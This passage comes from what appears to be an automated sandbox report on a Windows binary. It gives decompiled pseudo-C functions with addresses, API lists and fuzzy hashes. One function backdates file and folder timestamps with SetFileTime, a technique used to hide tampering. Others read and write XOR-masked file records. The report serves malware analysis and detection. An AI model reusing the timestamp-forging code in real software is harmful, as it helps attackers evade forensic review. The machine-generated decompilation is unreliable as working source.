						_t44 =  *(_t62 + 0x1c);
						if((_t26 & _t44) == 0xffffffff) {
							goto L18;
						} else {
							_t27 = _t26 | _t44;
							if(_t27 != 0) {
								_t42 = 0;
								 *((intOrPtr*)(_t62 + 0x38)) = 0;
								_t29 = ReadFile( *_t61, _t62 + 0x1c, 5, _t62 + 0x30, 0);
								__eflags = _t29;
								if(_t29 == 0) {
									goto L18;
								} else {
									while(1) {
										_t27 =  *(_t62 + 0x2c);
										__eflags = _t27;
										if(_t27 == 0) {
											goto L4;
										}
										__eflags = _t27 - 5;
										if(_t27 != 5) {
											L16:
											_t35 = E00418100(0,  *_t61, _t42,  *(_t62 + 0x24));
											__eflags = _t35;
											if(_t35 == 0) {
												goto L18;
											} else {
												_t27 = SetEndOfFile( *_t61);
												__eflags = _t27;
												if(_t27 != 0) {
													goto L4;
												} else {
													goto L18;
												}
											}
										} else {
											_t37 =  *(_t62 + 0x10) ^ _t61[4];
											asm("adc esi, [esp+0x24]");
											_t59 = _t37 + _t42 + 5;
											asm("adc esi, ecx");
											 *(_t62 + 0x10) = _t37;
											__eflags = 0 -  *(_t62 + 0x1c);
											if(__eflags > 0) {
												goto L16;
											} else {
												if(__eflags < 0) {
													L12:
													__eflags = _t37 - 0xa00000;
													if(_t37 > 0xa00000) {
														goto L16;
													} else {
														_push(1);
														_t38 = SetFilePointerEx( *_t61, _t37, 0, 0);
														__eflags = _t38;
														if(_t38 == 0) {
															goto L18;
														} else {
															_t42 = _t59;
															 *((intOrPtr*)(_t62 + 0x38)) = 0;
															_t40 = ReadFile( *_t61, _t62 + 0x1c, 5, _t62 + 0x30, 0);
															__eflags = _t40;
															if(_t40 != 0) {
																continue;
															} else {
																goto L18;
															}
														}
													}
												} else {
													__eflags = _t59 -  *(_t62 + 0x18);
													if(_t59 >  *(_t62 + 0x18)) {
														goto L16;
													} else {
														goto L12;
													}
												}
											}
										}
										goto L19;
									}
									goto L4;
								}
							} else {
								L4:
								_push(0);
								_t30 = _t27 | 0xffffffff;
								_t61[2] = _t30;
								_t61[3] = _t30;
								_t41 = 1;
								SetFilePointerEx( *_t61, 0, 0, 0);
								goto L5;
							}
						}
					}
				}
				L19:
			}

0x00419115
0x0041912e
0x00419130
0x00419136
0x0041913c
0x00419188
0x00419191
0x0041913e
0x00419144
0x0041914c
0x00419256
0x0041925a
0x00419262
0x0041926a
0x00419270
0x00419152
0x00419152
0x00419156
0x00419161
0x00000000
0x00419167
0x00419167
0x00419169
0x00419197
0x004191a7
0x004191ab
0x004191b1
0x004191b3
0x00000000
0x004191b9
0x004191b9
0x004191b9
0x004191bd
0x004191bf
0x00000000
0x00000000
0x004191c1
0x004191c4
0x0041922f
0x0041923b
0x00419240
0x00419242
0x00000000
0x00419244
0x00419248
0x0041924e
0x00419250
0x00000000
0x00000000
0x00000000
0x00000000
0x00419250
0x004191c6
0x004191ca
0x004191d5
0x004191d9
0x004191dc
0x004191de
0x004191e2
0x004191e6
0x00000000
0x004191e8
0x004191e8
0x004191f0
0x004191f0
0x004191f5
0x00000000
0x004191f7
0x004191fa
0x00419201
0x00419207
0x00419209
0x00000000
0x0041920b
0x0041921d
0x0041921f
0x00419223
0x00419229
0x0041922b
0x00000000
0x0041922d
0x00000000
0x0041922d
0x0041922b
0x00419209
0x004191ea
0x004191ea
0x004191ee
0x00000000
0x00000000
0x00000000
0x00000000
0x004191ee
0x004191e8
0x004191e6
0x00000000
0x004191c4
0x00000000
0x004191b9
0x0041916b
0x0041916b
0x0041916d
0x0041916e
0x00419176
0x00419179
0x00419180
0x00419182
0x00000000
0x00419182
0x00419169
0x00419161
0x0041914c
0x00000000

APIs

CreateFileW.KERNEL32(0042D4F8,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,?,?,00000000), ref: 00419130
GetFileSizeEx.KERNEL32(00000000,?,?,00000000), ref: 00419144
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00419182

Part of subcall function 00418100: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00419240,?,00000000,?,?,00000000), ref: 00418112

ReadFile.KERNEL32(?,?,00000005,?,00000000,?,00000000), ref: 004191AB
SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000001,?,00000000), ref: 00419201
ReadFile.KERNEL32(?,?,00000005,?,00000000,?,00000000,00000000,00000000,00000001,?,00000000), ref: 00419223
SetEndOfFile.KERNEL32(?,?,00000000,?,?,00000000), ref: 00419248
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0041925A

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Pointer$Read$CloseCreateHandleSize
String ID:
API String ID: 771431435-0
Opcode ID: 5f34af80b206632f83d1969567a9be69861cbfa5a77245deac7b3c1bcf4e2840
Instruction ID: bff7257d08670166ebb49018c5ee5219ceb500d4db21294e6dc30971168dd52b
Opcode Fuzzy Hash: 5f34af80b206632f83d1969567a9be69861cbfa5a77245deac7b3c1bcf4e2840
Instruction Fuzzy Hash: 5841CD712002017FEB14DF64DC88FEB73E8EB88710F048A2EF915D7290E674ED858A69

Uniqueness

Uniqueness Score: -1.00%

Function 00418380, Relevance: 12.1, APIs: 8, Instructions: 129
timefileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00418380(intOrPtr* __eax, signed int __ecx, void* __eflags) {
				short _v524;
				struct _SYSTEMTIME _v540;
				long _v544;
				struct _FILETIME _v552;
				char _v553;
				SYSTEMTIME* _v564;
				intOrPtr _v568;
				void* __edi;
				void* _t32;
				void* _t36;
				void* _t38;
				signed int _t40;
				signed int _t44;
				long _t47;
				signed int _t55;
				SYSTEMTIME* _t67;
				intOrPtr* _t78;
				void* _t80;
				signed int _t82;
				void* _t84;

				_t84 = (_t82 & 0xfffffff8) - 0x22c;
				_t78 = __eax;
				_t55 = __ecx;
				_v544 = 1;
				GetSystemTime( &_v540);
				_t67 =  &_v540;
				SystemTimeToFileTime(_t67,  &_v552);
				asm("adc ecx, 0xfe624e21");
				_t32 = E00415780(_v552.dwLowDateTime + 0x2ac18000, _v552.dwHighDateTime, 0x989680, 0);
				if(_t32 <= 0xa8c0 || _t32 < _t55) {
					L15:
					return 0;
				} else {
					_t34 = _t32 - 0xa8c0;
					if(_t32 - 0xa8c0 < _t55) {
						goto L15;
					} else {
						_t36 = E00412520(_t34 - _t55, 0);
						_t37 = _t36 + _t55;
						if(_t36 + _t55 < _t55) {
							goto L15;
						} else {
							_v553 = 1;
							_t38 = E004157F0(_t37, 0, 0x989680, 0);
							asm("adc edx, 0x19db1de");
							_v568 = _t38 + 0xd53e8000;
							_t40 = 0;
							_v564 = _t67;
							if(_t78 != 0 &&  *_t78 != 0) {
								do {
									_t40 = _t40 + 1;
								} while ( *((intOrPtr*)(_t78 + _t40 * 2)) != 0);
							}
							 *((short*)(_t84 + E00410820( &_v524, _t78, _t40 + _t40) + 0x30)) = 0;
							do {
								_t44 = PathIsDirectoryW( &_v524);
								asm("sbb ecx, ecx");
								_t80 = CreateFileW( &_v524, 0x100, 1, 0, 3,  ~((_t44 & 0xffffff00 | _t44 == 0x00000001) & 0x000000ff) & 0x02000000, 0);
								if(_t80 == 0xffffffff) {
									L11:
									_v553 = 0;
								} else {
									_t55 = _t55 & 0xffffff00 | SetFileTime(_t80,  &_v552,  &_v552,  &_v552) != 0x00000000;
									CloseHandle(_t80);
									if(_t55 == 0) {
										goto L11;
									}
								}
								_t47 = _v544;
								_v544 = _t47 - 1;
							} while (_t47 != 0 && PathRemoveFileSpecW( &_v524) != 0);
							return _v553;
						}
					}
				}
			}

0x00418386
0x0041838e
0x00418396
0x00418398
0x004183a0
0x004183ab
0x004183b0
0x004183ca
0x004183d2
0x004183dc
0x004184ec
0x004184f4
0x004183ea
0x004183ea
0x004183f1
0x00000000
0x004183f7
0x004183fb
0x00418400
0x00418404
0x00000000
0x0041840a
0x00418412
0x00418417
0x00418421
0x00418427
0x0041842b
0x0041842d
0x00418433
0x00418440
0x00418440
0x00418441
0x00418440
0x0041845d
0x00418462
0x00418467
0x00418476
0x00418495
0x0041849a
0x004184be
0x004184be
0x0041849c
0x004184b1
0x004184b4
0x004184bc
0x00000000
0x00000000
0x004184bc
0x004184c3
0x004184ca
0x004184ce
0x004184eb
0x004184eb
0x00418404
0x004183f1

APIs

GetSystemTime.KERNEL32 ref: 004183A0
SystemTimeToFileTime.KERNEL32(?,?), ref: 004183B0
__aulldiv.LIBCMT ref: 004183D2

Part of subcall function 00412520: GetTickCount.KERNEL32 ref: 00412527

PathIsDirectoryW.SHLWAPI(?), ref: 00418467
CreateFileW.KERNEL32(?,00000100,00000001,00000000,00000003,?,00000000,?,00000000,00000000,00000000,00989680,00000000,?,?,00989680), ref: 0041848F
SetFileTime.KERNEL32(00000000,?,?,?,?,00000000,?,00000000,00000000,00000000,00989680,00000000,?,?,00989680,00000000), ref: 004184A8
CloseHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,00989680,00000000,?,?,00989680,00000000), ref: 004184B4
PathRemoveFileSpecW.SHLWAPI(?,?,00000000,?,00000000,00000000,00000000,00989680,00000000,?,?,00989680,00000000), ref: 004184D7

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$PathSystem$CloseCountCreateDirectoryHandleRemoveSpecTick__aulldiv
String ID:
API String ID: 2367051557-0
Opcode ID: 8a69880eabc879851b090626e77c2c7df16eca70f1aaaa0e4ffa5682ab226b85
Instruction ID: a074aefb1d03e0e6691e326cc0d747b57c5e38cd8ed3c7733e408ffae559736a
Opcode Fuzzy Hash: 8a69880eabc879851b090626e77c2c7df16eca70f1aaaa0e4ffa5682ab226b85
Instruction Fuzzy Hash: 7641E8726043015BD724EF24ED85FEB77D8EBC4704F04092EF985D2291EA78C988876A

Uniqueness

Uniqueness Score: -1.00%

Function 004192B0, Relevance: 12.1, APIs: 8, Instructions: 119
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004192B0(void** __esi, void* _a4, long _a8) {
				union _LARGE_INTEGER* _v8;
				union _LARGE_INTEGER* _v12;
				signed int _v16;
				void* _v20;
				char _v28;
				long _v32;
				char _v33;
				void _v40;
				long _v44;
				signed int _t30;
				union _LARGE_INTEGER _t46;
				void** _t67;
				signed int _t68;

				_t67 = __esi;
				_t68 = _a8;
				_v33 = 0;
				if(_t68 > 0xa00000) {
					L12:
					return 0;
				} else {
					_push(1);
					if(SetFilePointerEx( *__esi, 0, 0,  &_v20) == 0 || (_v20 & _v16) == 0xffffffff) {
						goto L12;
					} else {
						_push(2);
						if(SetFilePointerEx( *__esi, 0, 0, 0) == 0) {
							goto L12;
						} else {
							_t30 = E00418120( *__esi);
							_t46 = _t30;
							_t31 = _t30 & 0;
							_v12 = 0;
							if((_t30 & 0) != 0xffffffff) {
								E00410870(_t31,  &_v28, 0, 5);
								_v40 = __esi[4] ^ _t68;
								if(WriteFile( *__esi,  &_v40, 5,  &_v44, 0) == 0 || _v32 != 5 || WriteFile( *__esi, _a4, _a8,  &_v32, 0) == 0 || _v32 != _a8) {
									_push(0);
									SetFilePointerEx( *_t67, _t46, _v8, 0);
									SetEndOfFile( *_t67);
								} else {
									_v33 = 1;
								}
							}
							FlushFileBuffers( *_t67);
							_push(0);
							SetFilePointerEx( *_t67, _v20, _v16, 0);
							return _v33;
						}
					}
				}
			}

0x004192b0
0x004192b5
0x004192bc
0x004192c6
0x004193d1
0x004193d7
0x004192cc
0x004192ce
0x004192e6
0x00000000
0x004192fd
0x004192ff
0x0041930d
0x00000000
0x00419313
0x00419316
0x0041931b
0x0041931d
0x0041931f
0x00419326
0x00419331
0x0041934e
0x0041935a
0x00419394
0x0041939b
0x004193a0
0x00419387
0x00419387
0x00419387
0x0041935a
0x004193a9
0x004193b9
0x004193c0
0x004193cc
0x004193cc
0x0041930d
0x004192e6

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,00000000), ref: 004192E2
SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000002,?,00000000), ref: 00419309

Part of subcall function 00418120: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000001,00000001,?,00000000), ref: 00418135

WriteFile.KERNEL32(?,00000005,00000005,?,00000000,?,00000000,00000005,?,?,00000000), ref: 00419356
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00000000,?,00000004,0000001E), ref: 00419377
SetFilePointerEx.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 0041939B
SetEndOfFile.KERNEL32(?,?,?,00000000), ref: 004193A0
FlushFileBuffers.KERNEL32(?,?,?,00000000), ref: 004193A9
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,00000000), ref: 004193C0

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Pointer$Write$BuffersFlush
String ID:
API String ID: 3148524875-0
Opcode ID: 37cbf46c965dd956aaa99562a929b21a191d502cc0d376ece76d3f82ff35b8a7
Instruction ID: e7e272161cf7bd27f1d9048c3342699c1de5d2638b6834a6b91a96a8a34a3ca1
Opcode Fuzzy Hash: 37cbf46c965dd956aaa99562a929b21a191d502cc0d376ece76d3f82ff35b8a7
Instruction Fuzzy Hash: 5A315D71244304ABD324EB66CC95FABB3E9AFCC704F104A1EF99097290D674ED858B66

Uniqueness

Uniqueness Score: -1.00%

Function 00407750, Relevance: 12.1, APIs: 8, Instructions: 96
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407750(WCHAR* __ecx, intOrPtr __edx, void* __eflags) {
				char _v336;
				short _v848;
				short _v856;
				char _v864;
				intOrPtr _v868;
				void* _v876;
				long _v880;
				void* __edi;
				void* __esi;
				signed int _t14;
				long _t31;
				WCHAR* _t35;
				void* _t38;
				WCHAR* _t42;
				void* _t43;
				long _t44;
				WCHAR* _t45;
				void* _t46;

				_t42 = __ecx;
				_t45 =  &_v864;
				_v868 = __edx;
				E00424100(0x2b, _t45);
				_t35 = _t45;
				L1:
				_t14 =  *_t35 & 0x0000ffff;
				if(_t14 == 0x5c || _t14 == 0x2f) {
					_t35 =  &(_t35[1]);
					goto L1;
				}
				if(PathCombineW( &_v848, _t42, _t35) == 0) {
					L16:
					return 1;
				}
				_t46 = CreateFileW( &_v856, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t46 == 0xffffffff) {
					goto L16;
				}
				_t43 =  &_v336;
				_t31 = 0;
				E004240C0(0x30, _t43);
				if(WriteFile(_t46, _t43, 0x146,  &_v880, 0) != 0 && _v880 == 0x146) {
					_t38 = _v876;
					if(_t38 != 0) {
						_t44 = E00411B00(_t38);
						if(WriteFile(_t46, _t38, _t44,  &_v880, 0) == 0 || _v880 != _t44) {
							_t31 = 0;
						} else {
							_t31 = 1;
						}
					} else {
						_t31 = 1;
					}
				}
				FlushFileBuffers(_t46);
				CloseHandle(_t46);
				if(_t31 == 0) {
					SetFileAttributesW( &_v856, 0x80);
					DeleteFileW( &_v856);
				}
				goto L16;
			}

0x00407758
0x0040775a
0x00407763
0x00407767
0x0040776c
0x00407770
0x00407770
0x00407776
0x0040777d
0x00000000
0x0040777d
0x00407791
0x00407859
0x00407862
0x00407862
0x004077b4
0x004077b9
0x00000000
0x00000000
0x004077c1
0x004077cd
0x004077cf
0x004077ee
0x004077fa
0x00407800
0x00407812
0x0040781b
0x00407827
0x00407823
0x00407823
0x00407823
0x00407802
0x00407802
0x00407802
0x00407800
0x0040782a
0x00407831
0x0040783b
0x00407847
0x00407852
0x00407852
0x00000000

APIs

PathCombineW.SHLWAPI(?,00000000,?,74B39600,00000000), ref: 00407789
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004077AE
WriteFile.KERNEL32(00000000,?,00000146,?,00000000,74B396D0,00000000), ref: 004077EA
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00407817
FlushFileBuffers.KERNEL32(00000000), ref: 0040782A
CloseHandle.KERNEL32(00000000), ref: 00407831
SetFileAttributesW.KERNEL32(?,00000080), ref: 00407847
DeleteFileW.KERNEL32(?), ref: 00407852

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Write$AttributesBuffersCloseCombineCreateDeleteFlushHandlePath
String ID:
API String ID: 1225955004-0
Opcode ID: 55ea57f635f186b6b971968d681ea03af36315812416ee0c10f2a38a81e28251
Instruction ID: c073a44c259d012f32c037504955845da49d2e1c997e63a904124d7e52d29c32
Opcode Fuzzy Hash: 55ea57f635f186b6b971968d681ea03af36315812416ee0c10f2a38a81e28251
Instruction Fuzzy Hash: 9C21E532A48301ABD620AB21AC49FAB3398AF95741F04493EF641F61D0DB78E905C76B

Uniqueness

Uniqueness Score: -1.00%

Function 00427350, Relevance: 12.1, APIs: 8, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00427350(void* __eax, struct tagRECT __ecx, void* __edx) {
				intOrPtr _t46;
				int _t49;
				void* _t50;
				void* _t57;
				intOrPtr _t58;
				void* _t71;
				void* _t72;
				struct tagRECT _t73;
				struct HWND__* _t74;
				void* _t75;
				signed int _t76;
				void* _t77;

				_t57 = __edx;
				_t71 = __eax;
				_t73 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t57 + 0x10));
				_t76 =  *(_t46 + 0x110) & 0x0000ffff;
				 *(_t77 + 0x18) =  *(_t46 + 0x108);
				ReleaseMutex( *(_t57 + 0x14));
				_t49 = GetWindowRect( *(_t77 + 0x14), _t77 + 0x18);
				if(_t49 != 0) {
					if(_t76 != 2) {
						_t50 = _t76 - 2;
						if(_t50 <= 0xf) {
							switch( *((intOrPtr*)(( *(_t50 + 0x42749c) & 0x000000ff) * 4 +  &M00427478))) {
								case 0:
									 *((intOrPtr*)(__esp + 0x1c)) = __edi;
									 *((intOrPtr*)(__esp + 0x18)) = __esi;
									goto L13;
								case 1:
									 *((intOrPtr*)(__esp + 0x24)) = __edi;
									goto L12;
								case 2:
									 *(_t77 + 0x18) = _t73;
									goto L13;
								case 3:
									L12:
									 *((intOrPtr*)(__esp + 0x20)) = __esi;
									goto L13;
								case 4:
									 *((intOrPtr*)(__esp + 0x1c)) = __edi;
									goto L13;
								case 5:
									 *((intOrPtr*)(__esp + 0x1c)) = __edi;
									goto L12;
								case 6:
									 *((intOrPtr*)(__esp + 0x24)) = __edi;
									goto L13;
								case 7:
									 *((intOrPtr*)(__esp + 0x24)) = __edi;
									 *((intOrPtr*)(__esp + 0x18)) = __esi;
									goto L13;
								case 8:
									goto L13;
							}
						}
					} else {
						_t58 =  *((intOrPtr*)(_t57 + 0x10));
						_t75 = _t73 -  *((intOrPtr*)(_t58 + 0x100));
						_t72 = _t71 -  *((intOrPtr*)(_t58 + 0x104));
						 *(_t77 + 0x18) =  *(_t77 + 0x18) + _t75;
						 *(_t77 + 0x1c) =  *(_t77 + 0x1c) + _t72;
						 *((intOrPtr*)(_t77 + 0x20)) =  *((intOrPtr*)(_t77 + 0x20)) + _t75;
						 *((intOrPtr*)(_t77 + 0x24)) =  *((intOrPtr*)(_t77 + 0x24)) + _t72;
					}
					L13:
					_t49 = IsRectEmpty(_t77 + 0x18);
					if(_t49 == 0) {
						_t74 =  *(_t77 + 0x14);
						if((GetWindowLongW(_t74, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_t74), _t77 + 0x1c, 2);
						}
						return SetWindowPos(_t74, 0,  *(_t77 + 0x18),  *(_t77 + 0x1c),  *((intOrPtr*)(_t77 + 0x28)) -  *(_t77 + 0x18),  *((intOrPtr*)(_t77 + 0x24)) -  *(_t77 + 0x1c), 0x630c);
					}
				}
				return _t49;
			}

0x00427357
0x00427359
0x00427361
0x00427363
0x00427369
0x00427375
0x0042737d
0x00427381
0x00427391
0x00427399
0x004273a2
0x004273c5
0x004273cb
0x004273d4
0x00000000
0x004273ed
0x004273f1
0x00000000
0x00000000
0x00427407
0x00000000
0x00000000
0x004273db
0x00000000
0x00000000
0x0042740b
0x0042740b
0x00000000
0x00000000
0x004273e1
0x00000000
0x00000000
0x004273f7
0x00000000
0x00000000
0x004273e7
0x00000000
0x00000000
0x004273fd
0x00427401
0x00000000
0x00000000
0x00000000
0x00000000
0x004273d4
0x004273a4
0x004273a4
0x004273a7
0x004273ad
0x004273b3
0x004273b7
0x004273bb
0x004273bf
0x004273bf
0x0042740f
0x00427414
0x0042741c
0x0042741e
0x00427430
0x00427443
0x00427443
0x00000000
0x00427469
0x0042741c
0x00427476

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,004278E5), ref: 00427363
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,004278E5), ref: 00427381
GetWindowRect.USER32 ref: 00427391
IsRectEmpty.USER32(?), ref: 00427414
GetWindowLongW.USER32(?,000000F0), ref: 00427425
GetParent.USER32(?), ref: 0042743A
MapWindowPoints.USER32 ref: 00427443
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C,?,?,?,?,?,?,?,004278E5), ref: 00427469

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: 7944ae83d066c2bc057a3eda2642eecb89c617086fe84867f196add9bc47fee6
Instruction ID: 7006958334d8f0ba4e2515da4589f04ca59f37595e58eb73062f7676e8df4305
Opcode Fuzzy Hash: 7944ae83d066c2bc057a3eda2642eecb89c617086fe84867f196add9bc47fee6
Instruction Fuzzy Hash: 8631BF706083219FD304EF15E98496BBBE8FF88750F10066EF98496262D774D906CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406080, Relevance: 10.7, APIs: 7, Instructions: 171
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00406080(intOrPtr* __eax, char _a4) {
				unsigned int _v8;
				unsigned int _v16;
				void* _t63;
				int _t64;
				void* _t69;
				signed int _t71;
				signed int _t72;
				signed int _t73;
				void* _t77;
				void* _t81;
				signed int _t83;
				unsigned int _t84;
				unsigned int _t85;
				intOrPtr* _t87;
				unsigned int _t88;
				struct HDC__* _t89;
				signed short _t90;
				signed char _t93;
				unsigned int _t97;
				char _t98;
				char _t99;
				char _t105;
				struct HDC__* _t107;
				void* _t108;
				void* _t109;
				char _t110;

				_t110 = _a4;
				_t87 = __eax;
				_t107 = _t89;
				_t63 = HeapAlloc( *0x42e6d4, 8, 0x58);
				_t109 = _t63;
				if(_t109 != 0) {
					 *_t109 = _t107;
					_t90 =  *_t87;
					 *(_t109 + 8) = _t90;
					_t64 =  *(_t87 + 4) & 0x0000ffff;
					_a4 = 0;
					 *(_t109 + 0xa) = _t64;
					if(_t110 == 0) {
						L29:
						HeapFree( *0x42e6d4, 0, _t109);
						_t109 = 0;
					} else {
						if(CreateCompatibleBitmap(_t107, _t90 & 0x0000ffff, _t64) == 0) {
							_t69 = 0;
						} else {
							_push(0x128);
							_push(_t110);
							_t6 = _t109 + 0x14; // 0x14
							_push( &_v16);
							_t69 = E00419A20(_t68, _t107);
						}
						 *(_t109 + 0x10) = _t69;
						if(_t69 == 0) {
							goto L29;
						} else {
							_t108 = _v16;
							_t93 =  *(_t108 + 0xe) >> 3;
							_t71 = ( *(_t109 + 8) & 0x0000ffff) * (_t93 & 0x000000ff);
							 *(_t109 + 0x30) = _t93;
							 *(_t109 + 0xc) = _t71;
							if((_t71 & 0x00000003) != 0) {
								_t71 = (_t71 & 0xfffffffc) + 4;
							}
							 *(_t109 + 0xc) = _t71;
							_t72 =  *(_t108 + 0xe);
							_t18 = _t109 + 0x20; // 0x20
							_t111 = _t18;
							 *_t18 = _t72;
							 *((char*)(_t109 + 0x21)) =  *(_t108 + 0xe);
							 *((char*)(_t109 + 0x22)) = 0;
							_t73 = _t72 & 0xffffff00 |  *(_t108 + 0xe) != 0x00000008;
							 *(_t109 + 0x23) = _t73;
							if(_t73 == 1) {
								_t83 =  *(_t108 + 0xe) & 0x0000ffff;
								if(_t83 != 0x10) {
									if(_t83 != 0x20) {
										_t97 = _v8;
										_t84 = _v8;
									} else {
										_t97 = 0xff0000;
										_t84 = 0xff00;
										_v16 = 0xff;
									}
								} else {
									_t97 = 0x7c00;
									_t84 = 0x3e0;
									_v16 = 0x1f;
								}
								_t105 = 0;
								while((_t97 & 0x00000001) == 0) {
									_t97 = _t97 >> 1;
									_t105 = _t105 + 1;
								}
								 *(_t109 + 0x24) = _t97;
								_t98 = 0;
								 *((char*)(_t109 + 0x2a)) = _t105;
								while((_t84 & 0x00000001) == 0) {
									_t84 = _t84 >> 1;
									_t98 = _t98 + 1;
								}
								 *(_t109 + 0x26) = _t84;
								_t85 = _v16;
								 *((char*)(_t109 + 0x2b)) = _t98;
								_t99 = 0;
								while((_t85 & 0x00000001) == 0) {
									_t85 = _t85 >> 1;
									_t99 = _t99 + 1;
								}
								 *(_t109 + 0x28) = _t85;
								 *((char*)(_t109 + 0x2c)) = _t99;
							}
							_t50 = _t109 + 0x31; // 0x31
							E00410820(_t50, _t111, 0x10);
							 *((char*)(_t109 + 0x41)) =  *(_t109 + 0x30);
							_t77 = ( *(_t109 + 0xa) & 0x0000ffff) *  *(_t109 + 0xc);
							 *((char*)(_t109 + 0x34)) = 1;
							if(_t77 != 0) {
								_t77 = HeapAlloc( *0x42e6d4, 8, _t77 + 4);
							}
							 *(_t109 + 0x18) = _t77;
							if(_t77 == 0) {
								L26:
								_t88 = _v8;
							} else {
								_t81 = SelectObject( *_t109,  *(_t109 + 0x10));
								 *(_t109 + 4) = _t81;
								_t88 = 1;
								if(_t81 == 0) {
									goto L26;
								}
							}
							HeapFree( *0x42e6d4, 0, _t108);
							if(_t88 == 0) {
								DeleteObject( *(_t109 + 0x10));
								goto L29;
							}
						}
					}
					return _t109;
				} else {
					return _t63;
				}
			}

0x00406083
0x0040608b
0x00406095
0x00406097
0x0040609d
0x004060a1
0x004060ab
0x004060ad
0x004060b0
0x004060b4
0x004060b8
0x004060bd
0x004060c3
0x00406243
0x0040624c
0x00406252
0x004060c9
0x004060d7
0x004060f0
0x004060d9
0x004060d9
0x004060de
0x004060df
0x004060e7
0x004060e9
0x004060e9
0x004060f2
0x004060f7
0x00000000
0x004060fd
0x004060fd
0x00406109
0x00406110
0x00406113
0x00406116
0x0040611b
0x00406120
0x00406120
0x00406123
0x00406126
0x00406129
0x00406129
0x0040612c
0x00406132
0x00406135
0x0040613e
0x00406141
0x00406146
0x0040614c
0x00406153
0x0040616c
0x00406182
0x00406186
0x0040616e
0x0040616e
0x00406173
0x00406178
0x00406178
0x00406155
0x00406155
0x0040615a
0x0040615f
0x0040615f
0x0040618a
0x0040618f
0x00406191
0x00406193
0x00406195
0x0040619a
0x0040619e
0x004061a0
0x004061a5
0x004061a7
0x004061a9
0x004061ab
0x004061af
0x004061b3
0x004061b7
0x004061ba
0x004061be
0x004061c0
0x004061c2
0x004061c4
0x004061c8
0x004061cc
0x004061cc
0x004061d2
0x004061d6
0x004061de
0x004061e5
0x004061e9
0x004061ef
0x004061fe
0x004061fe
0x00406204
0x00406209
0x00406221
0x00406221
0x0040620b
0x00406212
0x00406218
0x0040621b
0x0040621f
0x00000000
0x00000000
0x0040621f
0x0040622f
0x00406237
0x0040623d
0x00000000
0x0040623d
0x00406237
0x004060f7
0x0040625b
0x004060a8
0x004060a8
0x004060a8

APIs

HeapAlloc.KERNEL32(?,00000008,00000058,00000000,?,75315FF0,?,00000000,00406501,?), ref: 00406097
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004060CF

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocBitmapCompatibleCreateHeap
String ID:
API String ID: 4176786261-0
Opcode ID: c67a114f76833c92d784cf3014efd3b0814f4007bf76bacdb640805016c5b1ac
